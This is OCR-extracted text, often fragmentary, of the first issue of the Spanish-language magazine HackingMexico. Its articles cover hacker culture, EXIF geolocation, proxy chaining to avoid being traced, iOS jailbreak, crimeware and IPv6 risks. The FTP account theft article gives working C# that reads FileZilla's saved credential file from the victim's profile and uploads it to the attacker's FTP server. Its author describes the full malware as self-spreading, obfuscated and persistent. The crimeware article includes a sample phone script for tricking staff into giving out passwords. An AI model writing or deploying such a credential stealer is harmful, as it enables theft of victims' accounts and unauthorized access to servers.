Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Revista Hacking Mexic0 - 01
Revista Hacking Mexic0 - 01
C O N
N O S O T R O S
informes 55 10 68 88 09
info@hackingmexico.mx
editorial
Editorial
Bienvenidos a esta primera
publicacion de HackingMexico la
revista mexicana de seguridad
informatica y hacking. Este ejemplar
que tienes en tus manos es el
resultado de un gran esfuerzo por
parte de todo el equipo.
HackingMexico nace con el
objetivo de concientizar y educar
sobre los riesgos actuales de la
seguridad, desde un punto de vista
practico y ofensivo que nos permitira
adentrarnos a la manera de pensar del
atacante.
El material esta enfocado para cualquier
persona que desee adentrarse o pulir sus
conocimientos sobre hacking.
Nuestra mision es fomentar el conocimiento,
recolectar informacion es el primer paso a la
sabiduria, pero compartirla es el primer paso para
construir una comunidad, es por eso que te brindamos un
host gratuito para que publiques tu blog y compartas tus
investigaciones con la comunidad.
Recuerda que todos los enlaces a las descargas del software
que se mencione en la pagina estar listado en el portal oficial
www.hackingmexico.mx, dentro de la seccin de revistas.
Esperemos disfrutes este primer ejemplar, tanto como nosotros
hacindolo.
El Equipo HackingMexico
Agradecimientos a gente
que colaboro en este numero
M4ku4Z
Axxus
Profesor X
Zeus
Tognu
Molder Sombrero de Paja
Dr h47
Annika
No nos hacemos responsables por el mal uso de la informacion aqui expuesta, todo el material es con fines educativos
y de investigacion, hackingmexico no incita a ningun tipo
de vandalismo virtual, cyberbullying, ni cyberamenzas.
La informacion es para conocimiento de todos, para poder
www.hackingmexico.mx
CorruptedByte
Death/ Scarlett Toquero
(idea lateral-Despacho Editorial)
Megabyte
Helios Mier
Y el apoyo recibido por los alumnos
de El Instituto Tecnologico de
Tuxtepec y la FES Aragon
aprender como defenderse desde un punto de vista ofensivo.
Hackingmexico esta en contra de grupos de choque y activismo como Anonymous, nosotros somos un grupo de
profesionales expertos en seguridad informatica que no
apoyan este tipo de actividades delictivas.
haxorpedia
Haxorpedia
esteganografia
leet
Tecnicas de ocultamiento de cdigo dentro Termino usado para describir a la elite
de archivos, usualmente de imagen
hacktivismo
Movimiento hacker con ideales polticos
0day
o de carcter social
Vulnerbilidad en un sistema que no ha
Cyruxnet
Portal antiguo de internet que
publicaba bugs y 0days
Jailbreak
Proceso el cual te deja instalar
Bug
Error en un
sistema, un bicho.
elite
Minoria selecta
hax0r
Hacker
Exploit
Codigo o tecnica
que explota una
vulnerabilidad.
Ingenieria
Social Cookie
Tecnicas donde el objetivo es el ser
Archivo donde se guardan datos como
humano, burlar la ingenuidad.
Cracking
XSS
CONTENTS PAGE
a quin les llamado
un hacker
06
El
manifiesto
hacker
10
navegacin anonima
ocultando nuestras
huellas en internet
16
Hackintosh jailbreak en
dispositivos IOS
24
robo de identidad
mediante crimeware
30
www.hackingmexico.mx
facebook: explotando
al ser humano
12
vulnerabilidad
mikrotik httpproxy
callando al
chismoso
14
hacking
microsoft
c#
22
Robo de
cuentas
FTP
26
riesgos de
seguridad
en IPV
old school
Cyruxnet
40
www.hackingmexico.mx
contents page
Aquinle es llamado un
Hack
^POr
Jess Antonio
Alvarez Cedillo
Tognu
IPN-CIDETEC
legando al ao 2000,
En el 2000 Microsoft desarrollo
los piratas de los sisun
concepto que ha marcado desde
temas informticos
entonces
una actividad ilegal
se representan con
llamada
PIRATERIA,
aunque tambin
una persona con un cerebro desallaman
paratas
a
los
delincuentes
rrollado, curioss y con muy pocas
informticos.
Resulta
que
ahora los
armas: una simple computadora y
piratas
ya
no
tienen
un
parche en
una lnea telefnica. Hackers. Una
su
ojo
ni
un
garfio
en
reemplazo
de la
palabra que an no se encuentra en
mano.
Tampoco
existen
los
barcos
ni los
los diccionarios pero que ya suena
tesoros
escondidos
debajo
del
mar,
tampoco
en todas las personas que alguna
matan,
asesinan
y
violan
mujeres.
vez se interesaron por la informtica o leyeron algn diario. Proviene
de hack, el sonido que hacan los
(crack=destruir) son aquellas personas que
tcnicos de las empresas telefnicas al golsiempre buscan molestar a otros, piratear
pear los aparatos para que funcionen.
software protegido por leyes, destruir sisHoy es una palabra temida por emtemas muy complejos mediante la transmipresarios, legisladores y autoridades que
sin de poderosos virus, etc.
desean controlar a quienes se divierten
Generalmente son adolescentes inquiedescifrando claves para ingresar a lugares
tos que aprenden rpidamente este compleprohibidos y tener acceso a informacin
jo oficio. Se diferencian con los Hackers
indebida. En 1997, el 54 %de las empresas
porque no poseen ningn tipo de ideologa
norteamericanas sufrieron ataques en sus
cuando realizan sus trabajos. En cambio,
sistemas y ocasionaron prdidas totales de
el principal objetivo de los Hackers no es
137 millones de dlares en ese mismo ao.
convertirse en delincuentes sino pelear
El Pentgono, la CIA, UNICEF, La
contra un sistema injusto utilizando como
ONU y diversos organismos mundiales
arma al propio sistema. Su guerra es silenhan sido vctimas de intromisiones.
ciosa pero muy convincente.
Un hacker puede tardar meses en vulLa cultura popular define a los hackers
nerar un sistema ya que son cada vez ms
como aquellos que, con ayuda de sus conosofisticados. Pero el lema es viejo: hecha la
cimientos informaticos consiguen acceder a
ley, hecha la trampa.
los sistemas de los bancos y de los negociaMicrosoft por su parte, el sistema opedos del gobierno. Bucean por informacion
rativo ms popular y el ms atacado y los
que no les pertenece, roban software caro y
El termino comenzo a usarse aplicandomedios de comunicacin masivos prefierealizan transacciones de una cuenta bancalo a un grupo de pioneros de la informatica
ren tildarlos de delincuentes que intercepria a otra. Los criminologos, por otra parte,
del MIT, a principios de la decada de 1960.
tan cdigos de tarjetas de crdito y los utidescriben a los hackers en terminos menos
Desde entonces, y casi hasta finales de la
lizan para beneficio propio.
halagadores. Donn Parker los denomina viodecada de 1970, un hacker era una persona
Sin embargo tambin existen los que se
ladores electronicos y August Bequai los
obsesionada por conocer lo mas posible sointrometen en los sistemas de aeropuertos
describe como vandalos electronicos. Ambre los sistemas informaticos (Figura2). Los
produciendo un caos en los vuelos y en los
bos, aunque aseveran que las actividades de
diseadores de la computadora Apple, Jobs
horarios de los aviones. Pero he aqu la
los hackers son ilegales, eluden habilmente
y Wozniack, pueden considerarse hackers
gran diferencia en cuestin. Los crackers
llamarlos criminales informaticos.
en este sentido de la palabra.
www.hackingmexico.mx
er
www.hackingmexico.mx
principios de la decada de
1980, influenciados por
la difusion de la pelicula
Juegos de Guerra, y el ampliamente publicado arresto de una banda de hackers conocida como la 414, los
hackers pasaron a ser considerados como
chicos jovenes capaces de violar sistemas
informaticos de grandes empresas y del
gobierno. Desgraciadamente, los medios
de informacion y la comunidad cientifica
social no ha puesto mucho esfuerzo por
variar esta definicion. El problema para
llegar a una definicion mas precisa radica, tanto en la poca informacion que hay
sobre sus actividades diarias, como en el
hecho de que lo que se conoce de ellos
no siempre cabe bajo las etiquetas de los
delitos conocidos.
Parker reconoce que el hacking no
abarca todo el rango de actividades asociadas a la violacion de los sistemas informaticos, pero lo prefiere al termino
phreaking, que considera muy oscuro.
Por otra parte, Bequai no rechaza el termino phreaking y a menudo lo aplica a
Hacker:una persona
obsesionada por
conocer lo mas
posible sobre
los sistemas
informaticos.
Hack
hechos que Parker califica como de hacker. Bequai confunde aun mas el termino al definir al hacker como alguien que
utiliza ilegalmente las tarjetas de credito
telefonico para acceder a sistemas que
distribuyen software comercial ilegalmente. Veremos que esto tiene poco que
ver con las actuaciones propias de los hackers, pero es ilustrativa de otros tipos de
actividades informaticas inusuales.
Los terminos, hacker, phreaker
y pirata se presentan y definen
tal y como los entienden aquellos que se identifican con estos
papeles.En primer lugar, el area
de los hackers. En la tradicion de
esta comunidad informatica, el
hacker puede realizar dos tipos
de actividades:
METODOLOGIA PARA
HACKEAR
www.hackingmexico.mx
TAXONOMIA HACKER
La clasificacin general de las actividades de un hacker son clasificadas por
la idiologia con la que actua. Los colores
representan una ideologa y un comportamiento. La clasificacin solo tiene tres
categorias hacker:
1. Black hats: Gente apasionada por
la seguridad informtica. Esto concierne principalmente a entradas remotas no autorizadas por medio de
redes de comunicacin como Internet
para sacar o no provecho.
2. White hats: Incluye a aquellos que depuran y arreglan errores en los sistemas.
3. Grey hats:A los de moral ambigua.
QUE SE NESECITA
PARA SER UN HACKER?
Los hackers necesitan caros equipos
informticos y una estantera rellena de
manuales tcnicos?. La respuesta es NO!
,Hackear puede ser sorprendentemente fcil, mejor todava, si se sabe cmo
explorar el World Wide Web, se puede
encontrar casi cualquier informacin relacionada totalmente gratis. De hecho,
hackear es tan fcil que si se tiene un servicio on-line y se sabe cmo enviar y leer
un e-mail, se puede comenzar a hackear
inmediatamente. LA TECNICA llamada
GOOGLE HACKING (figura 4) es una
herramienta simple y sencilla donde solo
se necesita un navegador de Internet y el
servicio de busqueda GOOGLE.
Google Hacking.
ker
Un Hacker
generalmente
tiene sus
reglas aunque
estas sean
muy sencillas,
estas son:
I
II
III
IV
VI
VII
VIII
IX
www.hackingmexico.mx
el manifiesto hacker
mani
Uno ms ha sido capturado hoy,
Est en todos los peridicos.
Adolescente arrestado por delito informtico
Hacker arrestado por irrumpir en un sistema bancario.
//-Malditos muchachos. Son todos iguales.//
Pero pueden, con su psicologa barata y su cerebro de los aos
cincuenta, siquiera echar un vistazo a lo que hay detrs de los
ojos de un hacker? Se han parado alguna vez a pensar qu es lo
que le hace comportarse as, qu le ha convertido en lo que es?
Soy un Hacker, entra a mi mundo . . .
El mo es un mundo que comienza en la escuela . . .
Soy ms inteligente que la mayora de los otros muchachos, esa
basura que ellos nos ensean me aburre . . .
//-Malditos subrealizados. Son todos iguales.//
Estoy en la preparatoria.
He escuchado a los profesores explicar por decimoquinta vez
como reducir una fraccin.
Yo lo entiendo.
-No, Srta. Smith, no le voy a mostrar mi trabajo,
lo hice en mi mente . . .
//-Maldito muchacho. Probablemente se lo copi. Todos son iguales.//
10
www.hackingmexico.mx
fiesto
el manifiesto hacker
lE
Hacker
Nos han estado dando comida para bebs con cuchara en la escuela, cuando estbamos hambrientos de carne . . .
Las migajas de carne que ustedes dejaron escapar estaban masticadas y sin sabor.
Hemos sido dominados por los sdicos, o ignorados por los apticos.
Los pocos que tenan algo que ensearnos encontraron en nosotros alumnos atentos, pero esos pocos son como gotas de agua en
el desierto.
Este es nuestro mundo ahora . . .
El mundo del electrn y el switch, la belleza del baudio.
Hacemos uso de un servicio que ya existe sin pagar, por que podra ser ridculamente barato, si no estuviera en manos de glotones hambrientos de ganancias, y ustedes nos llaman criminales.
Nosotros exploramos . . .
y ustedes nos llaman criminales.
Nosotros buscamos detrs del conocimiento . . .
y ustedes nos llaman criminales.
Nosotros existimos sin color, sin nacionalidad, sin prejuicios religiosos . . . y ustedes nos llaman criminales.
Ustedes construyen bombas atmicas,
ustedes hacen la guerra,
TheMentor
www.hackingmexico.mx
11
vanidad
Mi pecado
favorito
Fenomeno social
Explotando la vanidad
Pues no se necesito de un gobierno imperialista que llevara a cabo esas acciones de control, nosotros
mismos sin que nadie nos obligue hacemos check in en facebook, o taggeamos a la gente con la que
estamos, dejamos un mapa de nuestras vidas plasmado en el mundo virtual, esta informacion es visible en
su mayoria, cualquier stalker podria saber a que lugares vas, con quien vas, con que frecuencia, y nosotros
mismos facilitamos esto simplemente por vanidad.
Queremos que nos vean hacer check in en el antro de moda, algun concierto, o tal vez que vean que diario
vas a comer a lugares elegantes, o que te la pasas de vacaciones en Europa.
Por ejemplo un criminal podra utilizar esta informacin para saber que no estas en casa, que te fuiste a un
concierto y que regresaras en muchas horas.
Las vidas de todos en las redes sociales se ven tan maravillosas, todos tienen muchos amigos, y van a salir a fiestas, y se la pasan super increible no? Todo mundo quiere mostrar que su vida es extrema, y llena de aventuras.
Una vez mas el intelecto humano ha sido explotado, no se necesito de un big brother para monitorear a la raza humana, han explotado nuestra VANIDAD.
La gente en tu vida, esta por temporadas, salvo la familia y algunas exepciones. Facebook nos facilita conectarnos con gente de
nuestro pasado, regresar con antiguas novias (regresar con una ex , es como ir a la venta de garaje y comprar tus porqueras de
nuevo), y esto hace que perdamos la oportunidad tal vez de conocer gente nueva que estaba destinada para nosotros, desde tiempos
antropolgicos las relaciones del ser humano han sido temporales, y ahora estamos alterando el curso natural de la vida.
Expl
serhu
Facebook :
POr
M.C Raul Robles A
Megabyte
12
www.hackingmexico.mx
al
EXIF Exchangeable
image file format
Definicion de Wikipedia:
Las etiquetas (tags) de metadatos definidas en el estndar Exif cubren un amplio espectro
incluido:
Informacin de fecha y hora. Las cmaras digitales registran la fecha y la hora actual y la
almacenan en los metadatos.
Configuracin de la cmara. Esta incluye informacin esttica como el modelo de cmara y el
fabricante, e informacin que varia con cada imagen como la orientacin, apertura, velocidad del
obturador, distancia focal, medidor de exposicin y la velocidad de la pelcula.
Informacin sobre localizacin, la cual podra provenir de un GPS conectado a la cmara. Hasta el
2004 solo una pocas cmaras lo soportaban
Geolocalizacion
Cada foto que tomas con tu Smartphone, por lo regular trae geolocalizacion activada. Estos datos se guardan
en forma de metadatos, embedidos en cada foto, que pueden ser extraidos fcilmente, y nos revelan una cantidad
enorme de datos, incluyendo tu localizacin exacta con coordenadas GPS
A travez de una sencilla aplicacin, podemos extraer las coordenadas GPS de la foto, y hacer uso de las API de
google maps, lo cual resulta en un punto en el mapa donde la foto fue tomada.
Existen varias herramientas para extraer estos datos, tales como creep.py un programa hecho en phyton que nos da una
interfaz grafica para geolocalizar usuarios a travez de twitter. Tambien puedes probarlo sin bajar ningn tipo de software
mediante la pagina exifdata.com
Conclusion
Para evitar que tu privacidad sea violada, desactiva la geolocalizacion de tu Smartphone, aunque algunos servicios como twitter ya
borran los metadatos de las fotos, hay muchos otros que siguen sin hacerlo.
otando
mano
www.hackingmexico.mx
13
vulnerabilidad
Vulnerabili
C
14
www.hackingmexico.mx
molder@aztlan-hack.org
Aztlan Hack / http://www.aztlan-hack.org
Mikrotik HttpProxy
vulnerabilidad
dad
Callando al Chismoso
www.hackingmexico.mx
15
navegacin annima
NAVEGACIN
ANNIMA
OCULTANDO
NUESTRAS HUELLAS
E N I N T E R N E T
D
Por Rodolfo H.Baz aKa Pr@fEsOr X
16
www.hackingmexico.mx
ese evento y sinti que no lo podan detectar y pues no previo ciertas cosas y en
menos de 20 minutos ya haba sido detectado y lo estaban ya sacando del evento.
xD, que recuerdos. Ahora si como dice el
dicho el diablo sabe ms por viejo que por
diablo con esta moraleja quiero prevenir
a todos nuestros lectores y lo pondr entre
comillas que tengan en la mente que nunca de los nunca ocultaremos nuestra IP al
100% y que siempre habr forma de rastrearte y localizarte.
CONEXINES POR
DEFAULT A INTERNET
Normalmente una conexin a internet
la hacemos de nuestra computadora a un
router el cual sirve como puerta de enlace
navegacin annima
Los Proxy
Ventajas
Modificacin. Como
Desventajas
En general, el uso de un
intermediario puede provocar:
Intromisin. Es un paso ms
Incoherencia. Si hace
Irregularidad. El hecho de
www.hackingmexico.mx
17
navegacin annima
Port
Type
Country
Last Test
80
transparent
Vietnam
2012-01-18
200.174.85.193
3128
transparent
Brazil
2012-01-18
165.228.131.12
80
transparent
Australia
2012-01-18
203.144.144.164
80
transparent
Thailand
2012-01-18
3128
transparent
Switzerland
2012-01-18
80
anonymity
United States
2012-01-18
62.65.159.183
63.149.98.18
IP. Es la IP con la que nos camuflajearemos y la que vern todas las paginas
que visitaremos, van entendiendo? ;P
Puerto. Canal de comunicacin por
donde mandaremos y recibiremos la
informacin.
Type. Creo que es la ms importante
ya que siempre deberemos escoger los
que tengan el tipo de HIgh Anonymity ya que estos no guardan Logs de
las computadoras que se conectan a
ellos y as si nos quieren rastrear
pues ser sper pero sper
difcil que nos localicen.
Bien con eso ya tenemos nuestro equipo configurado para navegar con
un servidor Proxy y ocultos detrs de este, por lo tanto como quedo la conexin la plasmaremos en el esquema siguiente: (imagen)
18
www.hackingmexico.mx
navegacin annima
PRINCIPIOS DE
OPERACIN
DE SOCKSCHAIN SERVER
SocksChain transmite la llamada
TCP del programa cliente (Firefox) a travs de una cadena de
proxy servers, Sockschain solo
se conecta el primer proxy server
de la cadena y el primer proxy
server a su vez manda la peticin
de conexin al segundo y as hasta
llegar al final de la cadena configurada, usando esta tipo de conexin donde el primero llamada al
segundo y el segundo al tercero y
el tercero al siguiente en la cadena,
el rastreo de la conexin inicial
es muy compleja, esto no quiere
decir que sea imposible de rastrear
ya que se podra seguir el orden
inverso de la conexin analizando
los logs de los servers conectados,
pero surge una pregunta si alguno
de los servidores de la cadena no
guardo los logs? Pues hasta ah
llego el rastreo ;), tericamente
este tipo de conexin provee un
alto grado de anonimato, me atrevera a decir que el grado de anonimato sera de un 70% y podra
aumentar el % si lo combinamos
con otras tcnicas pero tengan en
cuenta que el largo de la cadena
es inversamente proporcional a la
velocidad de conexin.
www.hackingmexico.mx
19
navegacin annima
CONFIGURACIN
DEL SOCKSCHAIN
Ahora veremos un software
que tambin tiene lo suyo, este
sirve para hacer manualmente
un Proxychain, o sea un
encadenamiento de varios Proxy`s
para as tener relativamente un
buen anonimato en la red.
Como dice mi hijo
papa menos platica y
mas accin hehehe, ok la
versin que instalaremos ser
SOCKSCHAIN v 3.11.151
mucha gente dice que este
software ya no funciona y
realmente en el sentido estricto
tienen razn ya que la lista de
Proxy`s servers que trae por
default est obsoleta, pero
aqu no usaremos esa lista si
no que vamos a crear nuestra
propia lista de servidores que
obtendremos de la pagina
mencionada en el apartado
CONFIGURACION DE
UTILERIAS.
Primeramente instalaremos
el sockschain como todo en
windows siguiente .. siguiente
hasta finalizar la instalacin, un
vez ah abrimos el programa y nos
aparecer la siguiente ventana:
20
www.hackingmexico.mx
Aqu como pueden ver ustedes aparecen unos servidores con un foquito
y otros con un icono circulo Rojo con
una X blanca eso quiere decir que los
segundos no estn en funcionamiento
entonces Tendremos que borrarlos seleccionndolos y dando clic en el botn
DELETE ya que estn en la lista solo
los que funcionaran, cerramos la ventana y ahora si a empezar la configurar el sockschain.
navegacin annima
Una vez estando ah en la ventana de creacin de la candena, vamos a configurar primeramente en la opcin llamada NAME le ponemos el nombre
con el cual identificaremos a nuestra cadena de conexin despus vamos a la
opcin donde pondremos la cantidad de Proxy`s servers a los que nos conectremos en este caso haremos una conexin a TRES servidores.
Punto seguido vamos ahora si a aadir las ip de los servidores a los cuales nos
conectaremos como se muestra en la imagen de arriba, ya seleccionados damos clic
en el botn OK y listo programa configurado, ahora si viene la prueba de fuego deberemos configurar nuestro explorador de Internet manualmente para que se conecte,
www.hackingmexico.mx
21
Mi
cro
hacking microsoft c#
Hacking
soft
22
www.hackingmexico.mx
hacking microsoft c#
tC#
Salida Consola
Debug en el Ide
www.hackingmexico.mx
23
hackintosh
Hack
jailbreak en d
Definicin de Jailbreak
Tomado de Wikipedia
Jailbreak: (en espaol, escaparse de la
crcel o, ms literalmente, rompecrcel),
un proceso que permite a los usuarios de
los dispositivos iPhone, iPod Touch, iPad
y Apple TV de todas las generaciones ejecutar aplicaciones distintas a las alojadas
en App Store, el sitio oficial de descarga
de programas para estos dispositivos.
24
www.hackingmexico.mx
ispositivos IOS
Al hacer
jailbreak, no
significa que
tendremos
liberado el
telfono,
eso es otro
proceso que
veremos
mucho mas
adelante.
ALGUNOS BENEFICIOS DE UN
DISPOSITIVO IOS CON Y SIN
JAILBREAK
Al Hacer el jailbreak obtendremos beneficios
que no podemos tener con un dispositivo por
llamarlo de alguna manera normal.
A continuacin detallare los beneficios
que su servidor ha usado en sus dispositivos:
Como pueden ver amigos los beneficios son bastantes buenos , pero la
lista no termina ah, son demasiados los
que podemos obtener, los cuales iremos
aprendiendo a instalar y usar .
CARACTERSTICAS PARA
OBTENER BENEFICIOS DEL
JAILBREAK
Como instalo dicho software para tener
esos beneficios?
La respuesta es muy simple, tenemos
que realizar el jailbreak al sistema IOS
del dispositivo.
Mi dispositivo de Apple es apto para
Tener jailbreak?
Si pero debe cumplir ciertos requisitos, antes de hacer un jailbreak es importante leer y saber que vamos a hacer
exactamente.
hackintosh
intosh
M4ku4Z^^
m4ku4z@m4ku4z.net
www.m4ku4z.net
DESPDIDA
Bueno amigos , hemos llegado a la recta final de esta seccin , donde aprendimos a conocer todo el potencial que podramos tener si hacemos jailbreak a nuestros dispositivos
, adems de conocer algunas preguntas que se hacen muchos cuando van empezando en
esto del jailbreak . Por mi parte es todo , sin antes agradecer su atencin y nos vemos
pronto en otro capitulo ms.
www.hackingmexico.mx
25
Robo de
H
Qu es FTP?
26
www.hackingmexico.mx
Robo de
cuentas FTP
Hay muchas maneras de robar cuentas FTP como infeccin por troyanos,
cuentas
FTP
Vulnerabilidades
en FileZilla
27
Desarrollemos
el script
28
www.hackingmexico.mx
Es un mtodo muy simple (claro para los que sabemos programar, si no sabes pues hay esta nuestro seor Google), a
simple vista se ve que lo nico que hace este mtodo es crear
un objeto XML para trabajar con el asi como se le da la ruta de
manera automtica con esta lnea:
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() +
\\FileZilla\\recentservers.xml;
.NET nos facilita la ruta y as nos quitamos el problema que nos
topamos con que el fichero XML este dentro de una carpeta dentro de otra carpeta con el nombre de usuario de la maquina que
obviamente desconocemos. Despus se procesa todo el XML y
se saca el valor de cada nodo que tiene las credenciales FTP, una
vez haciendo esto solo se guarda en un archivo de texto, pero obviamente con esto nosotros no tendramos las credenciales FTP
solo se almacenaran en un archivo de texto de la vctima, para
eso ahora programaremos un mtodo para enviar las contraseas
por medio de FTP a nuestro servidor, de la siguiente manera:
public void Send(string sHost, string sDir, string sUser, string sPass, string sFile)
{
string ftpHostDirFile = ftp:// + sHost +sDir +sFile;
FtpWebRequest ftp = (FtpWebRequest)FtpWebRequest.
Create(ftpHostDirFile);
ftp.Credentials = new NetworkCredential(sUser, sPass);
ftp.KeepAlive = true;
ftp.UseBinary = true;
ftp.Method = WebRequestMethods.Ftp.UploadFile;
FileStream fs = File.OpenRead(sFile);
byte[] buffer = new byte[fs.Length];
fs.Read(buffer, 0, buffer.Length);
fs.Close();
Stream ftpstream = ftp.GetRequestStream();
ftpstream.Write(buffer, 0, buffer.Length);
ftpstream.Close();
}
Con este mtodo nada mas le pasamos nuestras credenciales
FTP para mandar el fichero con las contraseas y ya en el mtodo principal solo llamamos a los mtodos que programamos anteriormente, la otra manera de hacerlo ms simple es
mandando directamente el fichero XML por FTP pero cuando
lo programe estaba programando un sistema de facturacin
electrnica y estaba practicando con los objetos XML, a este
cdigo le falta mucho yo solo les di el mtodo principal que
es como extraer las contraseas pero el malware completo que
desarrolle tiene mtodos de spreading, ofuscacin, ejecucin
durante el arranque, entre otros as como mtodos para el robo
de cuentas guardadas en chrome, firefox, internet explorer,
MSN y otros clientes FTP menos usados. Si el megabyte no se
rockstarea cuando se haga popular la revista y me deja escribir
para la revista, seguir compartiendo muchos otros mtodos
para escritura de malware ya un poco ms avanzados entre
otras cosas interesantes.
www.hackingmexico.mx
29
Robo
de
Identidad
mediante
Crimeware
Por: Arturo Zamora
@zeux0r
zeux0r@insecure.org.mx
30
www.hackingmexico.mx
El robo de identidad mediante el crimeware, actualmente es uno de los negocios mas lucrativos para los delincuentes informticos, en la actualidad obtienen
ganancias muy importantes, pero Porqu es esto tan lucrativo?
Bueno como sabemos para los delincuentes informticos este tipo de actividades
requieren de una inversin mnima y mximas ganancias, estamos hablando de invertir y generar un 99.09 % de ganancias, y con un mnimo de esfuerzo.As es el por
que el crimeware ha crecido demasiado en los ltimos aos.
Introduccin
Ingeniera social
Hay varias maneras de adquirir estos tipos de infecciones en la red, una de ellas es la ingeniera social.
Por lo regular el atacante maneja la ingeniera social a su favor invitando a los objetivos a entrar a
ver un anuncio, ya sean videos, fotos, etc.
Ya que las personas tenemos un defecto muy grande el cual se le llama curiosidad. Y por el simple
morbo de ver que sucede o que contiene ese correo aceptamos sin ni siquiera saber quien es el que
enva el correo o si esta verificado y as podemos ser una victima, otra de ellas es mediante el traspaso
de archivos de personas extraas que se hacen pasar por amigos para solamente robarte tu informacin
como estas hay muchsimas otras que por curiosidad acepten el contenido y queden vulnerables a perder
su informacin confidencial .
Ingeniera social
En el caso de las empresas el fall estara en los empleados, que a veces por falta de capacitacin
cometen estos errores.
Un caso seria la dependencia de soporte tcnico o de ayuda del personal de servicios informticos y podra pasar esto:
Simulacin de ingeniera social
interactuando con la persona
Riiiiiiing riiiiiiiing (sonido telefonico)
Asistente ejecutiva: Bueno?
Chico malo: Que tal Amy buenas tardes soy de soporte tcnico, oye mira me informaron
que tu equipo esta demasiado lento y quiero corroborar a que se debe.
Asistente ejecutiva: Hay que bueno, si mira es que se me pone muy
lenta la mquina y no puedo trabajar bien.
Chico malo: Ok, mira tienes un icono de asistencia remota en tu escritorio, brelo y
me podras proporcionar tu usuario y contrasea para entrar a tu equipo as revisarlo
de manera remota?
Asistente ejecutiva: Claro que si, mi usuario es ***** y mi contrasea *******
www.hackingmexico.mx
31
Ataque silencioso
Crimeware no viene solo, por lo regular tiene tambin ayuda de otras vulnerabilidades, estas vulnerabilidades se encargan de ayudar al software malicioso a
infectar a los equipos vulnerables.
Porqu le doy el nombre de ataque silencioso?
Ya hace tiempo existen scripts llamados exploit packs que se encargan de explotar varias vulnerabilidades en sistemas por lo regular estos se aprovechan de
la ejecucin remota en navegadores u otros complementos como lo son Word,
Excel, power point, java, reproductores de video y msica. Este error
hace que el usuario al aceptar, entrar o abrir un sitio quede automticamente infectado y sea una victima mas de este software. Con la ayuda de los exploit packs
el software se encontrara incrustado en el cdigo fuente del sitio como un frame
abriendo otro sitio o como un applet o ventana emergente tratando de hacer que
lo veamos casi obligatoriamente
32
www.hackingmexico.mx
Recoleccin de informacin
La recoleccin de informacin por parte del atacante la hace mediante bases de
datos o envindola via correo electrnico.
Unos ejemplos de ello son Botnets, almacenamiento mediante base de datos
via web. Tu identidad fue robada cuando has sido victima de robo de identidad
ya hay poco que puedas hacer, ya que tu nombre, domicilio entre otras cosas
han sido comprometidos; tambin a veces se tuvieron perdidas econmicas
en compras que no fueron autorizadas por la persona propietaria real de las
cuentas o simplemente extrajeron el dinero sin autorizacin consiente del usuario.
Proteccin
Los mtodos para protegernos son muchos , y tambin muchos softwares que
nos ayudan a esto.
Lo que tendramos mas en cuenta es controlar un poco mas la curiosidad,
antes de abrir un correo ver si la persona en verdad es quien dice ser, si no tenemos ese nombre en nuestras listas no abrirlo, evitar abrir archivos adjuntos,
no seguir links que nos lleven a otros sitios fuera del correo, no abrir los correos
de bandeja spam, si es que no los conocemos, y si los conocemos verificar que
sea el que lo enva, mantener nuestro antivirus actualizado y verificar una ves
a la semana que nuestro sistema este libre de amenazas, tener un scanner de
malware y que nos avise de sitios potencialmente peligrosos, verificar que no
tengamos procesos raros ejecutndose en nuestro sistema.
Ya si tienes mas paranoia , verificar todas las conexiones que hacemos y a donde
las hacemos, ver nuestro archivo host en caso que estemos usando Windows, y
. Naa creo que esas son todas. FIN?
www.hackingmexico.mx
33
340.2
82.36
6.920
riesgosde .938.
seguridad 463.4
63.37
en
4.607
.431.7
68.21
1.456
IPv6
hmier@ieee.org
34
www.hackingmexico.mx
ANTE
CE
DEN
TES
En diversas partes del mundo se han tomado variados esfuerzos para facilitar o
acelerar la transicin al nuevo protocolo
pero sin embargo, se espera que al menos durante un periodo de 10 a 15 aos
se viva una experiencia bastante dispar
en distintas regiones y distintos tipos de
usuarios para adoptar o disear nuevas
tecnologas compatibles con el nuevo
protocolo, lo cual crea un escenario de
seguridad peculiar para muchos debido
a la varianza de preparativos adecuados
y por el retraso en la implementacin en
comparacin con la disponilidad y acceso
a la nueva tecnologa que ya se encuentra
presente en diversos rubros de internet.
La transicin al protocolo IPv6 se consi-
Disponibilidad
inesperada
de IPv6
Casi todos los nuevos productos tecnolgicos en hardware y software con conectividad a internet vienen preparados de fbrica
para usar el protocolo IPv6, y muchos de
ellos vienen con el protocolo habilitado an
cuando no haya una conectividad completa
por parte del ISP, o en caso del que el ISP
ya ofrezca el servicio, que adicionalmente a
la conectividad IPv4, se tengan dispositivos
y servicios conectados por IPv6 sin que el
usuario se de cuenta.
www.hackingmexico.mx
35
Convivencia
simultnea
de mltiples
protocolos
IPv6 funciona de una manera distinta a
IPv4, de forma que deben de tratarse como
dos elementos aparte aunque se encuentren
presentes en un mismo sistema, lo cual se
espera que sea la situacin predominante
durante el periodo de transicin hasta que
la necesidad de contar an con servicios a
travs de IPv4 sea abandonada.
36
www.hackingmexico.mx
Acceso
directo
por
IPv6
Tuneleo y
canales
furtivos
El protocolo IPv6 integra de forma nativa la facilidad para establecer canales
y tuneles encubiertos de comunicacin
buscando seguridad y privacidad de las
comunicaciones, as como tambin contar con funciones de tunneling destinadas
a ayudar a organizaciones a dar conectividad IPv6 durante su periodo de transicin. As tambin existen servicios pblicos gratuitos para ofrecer a un usuario la
posibilidad de dar salida a un tunel IPv6
desde su terminal.
Tecnologa
y servicios
inpreparados
IPv6 corrige algunos errores de diseo de IPv4 que se traducian en vulnerabilidades de seguridad muy dficiles
de enfrentar, para lo cual a lo largo del
tiempo se desarrollaron estrategias y
tecnologas que eran opcionales implementar, pero que al hacerlo se reducian
www.hackingmexico.mx
37
Saturacin
de recursos
ridad del sistema deben de incluir casos de
prueba contemplando el mismo escenario.
Debido a que el protocolo IPv6 contempla 128 bits para designar el direccionamiento, se espera que a cada usuario y red
local se le delegen una enorme cantidad
de direcciones IP para su uso a discrecin
del administrador del segmento.
Estas increibles cantidades de direcciones que se ponen sobre la mesa a partir
de este momento, puede llegar a generar
una situacin de negacin de servicio
38
www.hackingmexico.mx
Geolocalizacin
y personalizacin
de direcciones
news/2011/050311-microsoft-juniperipv6.html
Si bien la cantidad de direcciones IP disponible es inmensa, una combinacin de
Tecnologa
naciente y
vulnerabilidades
por descubrir
implicaciones en cuanto a privacidad y
registrabilidad.
Como en todo producto tecnolgico de
creacin reciente, apenas est por iniciar
su etapa de evaluacin a gran escala por
parte de los usuarios y entusiastas que la
hackean hasta llevarla a sus lmites, de
manera que se tienen que tener durante
